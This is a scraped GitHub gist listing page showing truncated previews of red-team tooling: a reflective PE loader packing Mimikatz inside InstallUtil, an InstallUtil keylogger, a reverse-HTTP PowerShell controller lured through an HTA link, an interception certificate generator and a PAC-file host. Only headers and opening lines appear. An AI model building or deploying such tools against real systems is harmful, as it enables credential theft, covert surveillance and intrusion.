Nicholas McKinney nicholasmckinney
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Net; | |
| using System.Text; | |
| using System.IO.Compression; | |
| using System.Collections.Generic; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| using System.Security.Cryptography; |
nicholasmckinney
/ InterceptorCertGen.ps1
Created
May 8, 2017 00:27
Windows Nano Server - Certificate Generation and Installation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-CreateCertificate([string] $certSubject, [bool] $isCA) | |
| { | |
| $CAsubject = $certSubject | |
| $dn = new-object -com "X509Enrollment.CX500DistinguishedName" | |
| $dn.Encode( "CN=" + $CAsubject, $dn.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE) | |
| #Issuer Property for cleanup | |
| $issuer = "__Interceptor_Trusted_Root" | |
| $issuerdn = new-object -com "X509Enrollment.CX500DistinguishedName" | |
| $issuerdn.Encode("CN=" + $issuer, $dn.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE) | |
| # Create a new Private Key |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Infosec Team Book List | |
| The Cuckoo's Egg - Cliff Stoll | |
| Hacking, The Art of Exploitation - Jon Ericson | |
| Art of Memory Forensics - by Michael Hale Ligh, Andrew Case, Jamie Levy, AAron Walters | |
| Kingpin: How One Hacker Took Over the Billion-Dollar Cybercrime Underground - Kevin Poulsen | |
| Ghost in the Wires: My Adventures as the World's Most Wanted Hacker - Kevin Mitnick | |
| Daemon - Daniel Suarez |
nicholasmckinney
/ PELoader.cs
Created
May 8, 2017 00:27
Reflective PE Loader - Compressed Mimikatz inside of InstallUtil
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.IO.Compression; | |
| using System.Text; | |
| using System.Collections.Generic; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
nicholasmckinney
/ iukl.cs
Created
May 8, 2017 00:27
InstallUtil Keylogger/MouseClick Recorder - Stores Logs in [Documents\Klog-Logs]
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Diagnostics; | |
| using System.Windows.Forms; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| //KeyStroke Mouse Clicks Code | |
| /* | |
| * https://code.google.com/p/klog-sharp/ | |
| */ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Created By Casey Smith | |
| @subTee | |
| RSA in PowerShell. | |
| Just Cause... | |
| Reference notes for the curious | |
| p = 61 <= first prime number (destroy this after computing e and d) | |
| q = 53 <= second prime number (destroy this after computing e and d) |
nicholasmckinney
/ gist:f5a4c6e106234fe94688c860587d3b16
Created
May 8, 2017 00:27
Reverse HTTP PowerShell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Simply Invoke the Script and send the target a link to http://192.168.1.1/app.hta | |
| To change your server, simply find and replace 192.168.1.1 with your server in the code. | |
| #> | |
| function Receive-Request { | |
| param( | |
| $Request | |
| ) | |
| $output = "" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8" ?> | |
| <configuration> | |
| <!-- Encrypt Element -> C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe -pef "secretStuff" "C:\Tools" --> | |
| <!-- Decrypt Element -> C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe -pdf "secretStuff" "C:\Tools" --> | |
| <!-- See https://msdn.microsoft.com/en-us/library/2w117ede.aspx --> | |
| <!-- Example by @subTee --> | |
| <connectionStrings> | |
| <add name="constr" connectionString="blah" /> | |
| </connectionStrings> | |
| <system.web> |
nicholasmckinney
/ PacHost.ps1
Created
May 8, 2017 00:27
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Start-PACFileHosting() | |
| { | |
| # Example PAC File Hosting | |
| # Pattern after http://obscuresecurity.blogspot.com/2014/05/dirty-powershell-webserver.html | |
| # example: http://localhost:8083/i.pac | |
| # Be Certain Line 19 matches your Interceptor Config | |
| Start-Job -ScriptBlock { | |
| $Hso = New-Object Net.HttpListener | |
| $Hso.Prefixes.Add("http://+:8083/") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Text; | |
| using Microsoft.Win32; | |
| using System.IO.Compression; | |
| using System.EnterpriseServices; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| using System.Security.Cryptography; |
OlderNewer